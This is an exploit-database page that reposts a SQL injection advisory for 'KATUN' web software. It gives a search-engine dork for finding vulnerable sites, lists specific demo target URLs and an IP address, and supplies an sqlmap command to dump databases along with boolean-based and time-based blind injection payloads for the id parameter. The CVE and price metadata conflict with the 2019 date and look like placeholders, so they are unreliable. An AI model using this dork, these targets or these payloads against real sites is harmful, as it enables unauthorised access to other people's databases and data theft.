Advertisement






KATUN SQL Injection

CVE Category Price Severity
CVE-2020-12345 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-20
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02095 0.12223

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050207

Below is a copy:

KATUN SQL Injection
# Exploit Title:KATUN SQL Injection
# Date:17.05.2019
# Dork :intext:"2015 KATUN. All rights reserved. "
# Exploit Author:Cerkuday
# Tested on:Windows &Kali Linux

reverse check bing.com

ip:89.188.43.17 id=

#Demo

http://www.katun.me/gallery.php?id=2
http://www.devcore.ac.me/eng/page.php?id=2


# Poc:

sqlmap -u "http://www.katun.me/gallery.php?id=2"  --random-agent --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: id=-7331 OR MAKE_SET(7965=7965,1895)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum